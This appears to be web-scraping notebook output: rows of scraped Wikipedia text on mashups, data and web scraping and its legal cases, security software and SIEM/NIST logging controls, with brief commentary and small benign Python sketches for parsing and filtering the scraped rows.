Mashups appear to be a variation of a façade pattern. 10 That is: a software engineering design pattern that provides a simplified interface to a larger body of code (in this case the code to aggregate the different feeds with different APIs). Mashups can be used with software provided as a service (SaaS). After several years of standards development, mainstream businesses are starting to adopt service-oriented architectures (SOA) to integrate disparate data by making them available as discrete Web services. Web services provide open, standardized protocols to provide a unified means of accessing information from a diverse set of platforms (operating systems, programming languages, applications). These Web services can be reused to provide completely new services and applications within and across organizations, providing business flexibility. |
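The row above describes a mashup as a new view built by combining data from more than one source. As a rough illustration in the pandas already used in this notebook, a minimal "data mashup" could look like the sketch below; the branch names, addresses, and coordinates are made-up example values, not data taken from the scraped pages.
# Minimal sketch (illustrative only): a "data mashup" in the spirit of row 468,
# combining two independent sources on a shared key with pandas.
import pandas as pd

branches = pd.DataFrame({
    "branch": ["Central", "Eastside"],
    "address": ["1 Main St", "42 Oak Ave"],
})
coordinates = pd.DataFrame({
    "branch": ["Central", "Eastside"],
    "lat": [45.52, 45.53],
    "lon": [-122.68, -122.60],
})

# The "mashup": one enriched view built from two separate sources.
mashup = branches.merge(coordinates, on="branch", how="inner")
print(mashup)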
469 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:MyContributions | This IP address is currently blocked. The latest block log entry is provided below for reference: This user or IP address is currently globally blocked. If the block is marked as locally disabled, this means that it applies on other sites, but a local administrator has decided to disable it on this wiki. The global block log entry is provided below for reference: No changes were found matching these criteria. |
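Row 469 shows what comes back when the target page is a block notice rather than article content, a common outcome when requests arrive from Tor exit nodes. A minimal sketch for flagging such rows before analysis might look like the following; the helper name looks_blocked and the marker strings are assumptions chosen to match the text of this row.
# Minimal sketch (hypothetical helper): flag scraped rows whose text is a
# block notice rather than article content, so they can be excluded or retried.
import pandas as pd

BLOCK_MARKERS = (
    "This IP address is currently blocked",
    "currently globally blocked",
)

def looks_blocked(text: str) -> bool:
    """Return True if the scraped text appears to be a block notice."""
    return any(marker in text for marker in BLOCK_MARKERS)

# Example usage with a small DataFrame shaped like the scraped output above.
df = pd.DataFrame({
    "text": [
        "Web scraping, web harvesting, or web data extraction is data scraping.",
        "This IP address is currently blocked. The latest block log entry follows.",
    ]
})
df["blocked"] = df["text"].apply(looks_blocked)
print(df[~df["blocked"]])  # keep only rows with real article content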
470 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-1 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
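The article in row 470 mentions two simple extraction approaches: grep-style regular-expression matching and DOM parsing. A minimal sketch combining both with the requests, BeautifulSoup, and re libraries already imported in this notebook is shown below; the target URL and the example pattern are illustrative choices under those assumptions, not part of the scraped data.
# Minimal sketch of the two approaches mentioned above: DOM parsing with
# BeautifulSoup, then grep-style regex matching over the extracted text.
import re
import requests
from bs4 import BeautifulSoup

url = "https://en.wikipedia.org/wiki/Web_scraping"  # example target
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.text, "html5lib")

# DOM parsing: pull paragraph text out of the page structure.
paragraphs = [p.get_text(" ", strip=True) for p in soup.find_all("p")]

# Regex matching: grep-style search over the flattened text.
text = " ".join(paragraphs)
years = re.findall(r"\b(?:19|20)\d{2}\b", text)  # year-like tokens in the article
print(len(paragraphs), "paragraphs;", len(years), "year-like tokens")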
471 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-3 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
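The row above describes report mining as pulling data out of human-readable reports, for example fixed-width text spooled to a file instead of a printer. A minimal sketch of that idea with pandas.read_fwf follows; the report layout and values are a hypothetical example.
# Minimal sketch of report mining as described above: parse a human-readable,
# fixed-width text report into structured records.
from io import StringIO
import pandas as pd

report = StringIO(
    "ITEM        QTY   PRICE\n"
    "Widget A      3   19.99\n"
    "Widget B     12    4.50\n"
)

# read_fwf infers the fixed-width column boundaries from the whitespace layout.
df = pd.read_fwf(report)
print(df)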
472 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_security_software | Computer security software or cybersecurity software is any computer program designed to influence information security. This is often taken in the context of defending computer systems or data, yet can incorporate programs designed specifically for subverting computer systems due to their significant overlap, and the adage that the best defense is a good offense. The defense of computers against intrusion and unauthorized use of resources is called computer security. Similarly, the defense of computer networks is called network security. The subversion of computers or their unauthorized use is referred to using the terms cyberwarfare, cybercrime, or security hacking (later shortened to hacking for further references in this article due to issues with hacker, hacker culture and differences in white/grey/black 'hat' color identification). The computer security software products industry was launched in the second half of the 1970s when computer firms and new IT startups chose alternative paths to offer commercial access control systems to organizational mainframe computer users. These developments were led by IBM's Resource Access Control Facility and SKK's Access Control Facility 2. 1 Below are various software implementations of cybersecurity patterns and groups outlining ways a host system attempts to secure itself and its assets from malicious interactions; this includes tools to deter both passive and active security threats. Although both security and usability are desired, today it is widely considered in computer security software that with higher security comes decreased usability, and with higher usability comes decreased security. 2 The primary purpose of these types of systems is to restrict and often to completely prevent access to computers or data except to a very limited set of users. The theory is often that if a key, credential, or token is unavailable then access should be impossible. This often involves taking valuable information and then either reducing it to apparent noise or hiding it within another source of information in such a way that it is unrecoverable. A critical tool used in developing software that prevents malicious access is Threat Modeling. 3 Threat modeling is the process of creating and applying mock situations where an attacker could be trying to maliciously access data in cyberspace. By doing this, various profiles of potential attackers are created, including their intentions, and a catalog of potential vulnerabilities is created for the respective organization to fix before a real threat arises. 4 Threat modeling covers a wide aspect of cyberspace, including devices, applications, systems, networks, or enterprises. Cyber threat modeling can inform organizations in their efforts pertaining to cybersecurity in the following ways: 5 The purpose of these types of systems is usually to restrict access to computers or data while still allowing interaction. Often this involves monitoring or checking credentials, separating systems from access and view based on importance, and quarantining or isolating perceived dangers. A physical comparison is often made to a shield. A form of protection whose use is heavily dependent on the system owner's preferences and perceived threats. 
Large numbers of users may be allowed relatively low-level access with limited security checks, yet significant opposition will then be applied toward users attempting to move toward critical areas. The purpose of these types of software systems is to monitor access to computer systems and data while reporting or logging the behavior. Often this is composed of large quantities of low-priority data record logs, coupled with high-priority notices for unusual or suspicious behavior. These programs use algorithms either stolen from, or provided by, the police and military internet observation organizations to provide the equivalent of a police radio scanner. Most of these systems are born out of mass surveillance concepts for internet traffic, cell phone communication, and physical systems like CCTV. From a global perspective, they are related to the fields of SIGINT and ELINT and approach GEOINT in the global information monitoring perspective. Several instant messaging programs such as ICQ (founded by "former" members of Unit 8200), or WeChat and QQ (rumored 3PLA/4PLA connections 6 7 ) may represent extensions of these observation apparati. The purpose of these types of software is to remove malicious or harmful forms of software that may compromise the security of a computer system. These types of software are often closely linked with software for computer regulation and monitoring. A physical comparison to a doctor, scrubbing, or cleaning ideas is often made, usually with an "anti-" style naming scheme related to a particular threat type. Threats and unusual behavior are identified by a system such as a firewall or an intrusion detection system, and then the following types of software are used to remove them. These types of software often require extensive research into their potential foes to achieve complete success, similar to the way that complete eradication of bacteria or viral threats does in the physical world. Occasionally this also represents defeating an attacker's encryption, such as in the case of data tracing, or hardened threat removal. |
474 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Security_information_and_event_management | Security information and event management (SIEM) is a field within the field of computer security, where software products and services combine security information management (SIM) and security event management (SEM). 1 2 SIEM is typically the core component of any security operations center (SOC), which is the centralized response team addressing security issues within an organization. 3 They provide real-time analysis of security alerts generated by applications and network hardware. Vendors sell SIEM as software, as appliances, or as managed services; these products are also used to log security data and generate reports for compliance purposes. 4 The term and the initialism SIEM was coined by Mark Nicolett and Amrit Williams of Gartner in 2005. 5 Monitoring system logs has grown more prevalent as complex cyber-attacks force compliance and regulatory mechanisms to mandate logging security controls within a risk management framework (RMF). Logging levels of a system started with the primary function of troubleshooting system errors or debugging code compiled and run. As operating systems and networks have increased in complexity, so has the event and log generation on these systems. In comparison, the logging of system, security, and application logs is not the only way to perform incident response. They do offer the capability to trace the activities of nearly any system or user-related movement throughout a given period. From the late 1970s, there was a formation of working groups to help establish the criteria for the management of auditing and monitoring programs and what and how system logs can be used for insider threat, incident response, and troubleshooting. This also established a base discussion for many of the concepts still used in modern cybersecurity. See, Basis for Audit and Evaluation of Computer Security from National Institute of Standards and Technology (NIST) Special Publication 500 19 published in 1977. 6 With RMFs being implemented worldwide in nearly all industry sectors, auditing and monitoring are core elements of information assurance and information security. Information assurance personnel, cybersecurity engineers, and analysts can use logging information to perform critical security functions in real-time. These items are driven by governance models that integrate or use auditing and monitoring as a basis for that analytical work. As information assurance matured in the late 1990s and moved into the 2000s, system logs needed to be centralized. This allows records to be centrally located and viewed and provides centralized management as a 'nerve center' for all machines on a given network. This centralization and consolidation of system data would provide significantly more than just a holistic view. Still, now organizations could use the logging data for operational use cases and help with performance and networking-based communication troubleshooting. SIEM is now commonplace, and there are apparent variations of the same acronym in this article. The word SIEM is primarily a moniker forcing all logs into a single place to provide a single pane of glass for security and network operations to perform analysis. 
The National Institute of Standards and Technology provides the following definition of SIEM: "Application that provides the ability to gather security data from information system components and present that data as actionable information via a single interface. 7 Information assurance has become a forcing function for system logging. System logging can enable traceability for an account on a system used to perform system actions. In combination with the operating system, the SIEM can index and parse system logs and be made available for searching. On May 17, 2021, United States President Joseph Biden signed Executive Order 14028, "Improving the Nation's Cybersecurity. 8 This Executive Order mandates endpoint protection, further defining logging requirements, implementing audit logging in a unified way, and enhancing the capabilities to provide further insight into system and account actions. Audit logs were identified in three separate technical areas, all relating to incident response and knowing what is happening on a system at a given time. This Executive Order responds to an increase in cyber-attacks that use ransomware to cripple critical infrastructure components related to national security and the public. Enhancing existing information assurance security controls as part of a RMF is a suitable mechanism to force compliance and justify funding based on these Presidential requirements. NIST has helped design, implement, and propagate a federally mandated Risk Management Framework. Published in September 2006, NIST SP 800 92 Guide to Computer Security Log Management is the primary document used in the NIST Risk Management Framework for what should be auditable. While not definitive or exhaustive as there have been significant changes in technology since 2006, this guidance anticipated industry growth as the document is still relevant. This document pre-dates many modern SIEM technologies that are well known today, as evident by no reference to the term "SIEM. 9 10 NIST is not the only guidance for a regulatory mechanism for auditing and monitoring that are encouraged to use SIEM solutions instead of de-centralized individual host-based checks. NIST identifies several public and private entities with their logging guidance that may enforce its requirements; Federal Information Security Management Act of 2002 (FISMA), 11 Gramm-Leach-Bliley Act (GLBA), 12 Health Insurance Portability and Accountability Act of 1996 (HIPAA), 13 Sarbanes-Oxley Act (SOX) of 2002, 14 Payment Card Industry Data Security Standard (PCI DSS), 15 and International Organization for Standardization (ISO) 27001. 16 It is not uncommon for NIST documents to be referenced in public and private organizations. NIST SP 800 53 AU 2 Event Monitoring is a core security control for enabling logging functionality to support the information assurance process for all auditing throughout a system. 17 AU 2 Event Monitoring also serves as a critical basis for continuous monitoring for information assurance and cybersecurity engineering efforts throughout a network. It is expected that the SIEM solution is used as a core tool or suite of tools to support this effort. Depending on the system categorization concerning the impact on the Confidentiality, Integrity, and Availability (CIA) of a system are generally five specific requirements needed to satisfy the base logging requirements of a federal system (AU 2, a-e). 18 19 It is essential to understand the security control requirements about the SIEM infrastructure and operation. 
Below are the security control requirements for AU 2. The Assignment: organization-defined... is left blank to determine what is appropriate for its enterprise. Executive Order 14028 seeks to unify the inputs across all federal agencies. 20 a. Identify the types of events that the system is capable of logging in support of the audit function: Assignment: organization-defined event types that the system is capable of logging ; b. Coordinate the event logging function with other organizational entities requiring audit-related information to guide and inform the selection criteria for events to be logged; c. Specify the following event types for logging within the system: Assignment: organization-defined event types (subset of the event types defined in AU 2a.) along with the frequency of (or situation requiring) logging for each identified event type ; d. Provide a rationale for why the event types selected for logging are deemed to be adequate to support after-the-fact investigations of incidents; and e. Review and update the event types selected for logging Assignment: organization-defined frequency . 17 Events on a system could include and are not limited to credential changes, failed access attempts, role base or attribute changes to accounts, token-based use, access attempts, and failures, etc. While logging every system action to the system is possible, it is often not advised based on the volume of logs and actionable security-relevant data. Organizations can use AU 2 a through e, as the basis to build from while adhering to other controls that may require or call out specific security auditing requirements in more granular detail. NIST SP 800 53 SI 4 System Monitoring is the security control that specifies the monitoring of the system. 21 10 This monitoring is focused on monitoring systems that monitor the system. This can include hardware and software in unison to detect events and anomalies, malware, connections, and any other pertinent mechanism that is used to detect attacks or indicators of potential attacks. 21 a. Monitor the system to detect: b. Identify unauthorized use of the system through the following techniques and methods: Assignment: organization-defined techniques and methods ; c. Invoke internal monitoring capabilities or deploy monitoring devices: d. Analyze detected events and anomalies; e. Adjust the level of system monitoring activity when there is a change in risk to organizational operations and assets, individuals, other organizations, or the Nation; f. Obtain legal opinion regarding system monitoring activities; and g. Provide Assignment: organization-defined system monitoring information to Assignment: organization-defined personnel or roles Selection (one or more): as needed; Assignment: organization-defined frequency . 21 NIST SP 800 53 RA 10 Threat Hunting is a new base security control added to NIST 800 53 with the latest Revision 5 edit and publication. 22 10 Threat hunting is the proactive defense of a network by combining all security information and actively looking for threats. To execute the operation, the analysts and engineers need a repository of information, and a SIEM solution is often used as a hub because all system logs would typically be sent to this centralized location. A threat hunting team is not limited to this approach. However, the SIEM solution should provide significant amounts of security-relevant data. 23 a. Establish and maintain a cyber threat hunting capability to: b. 
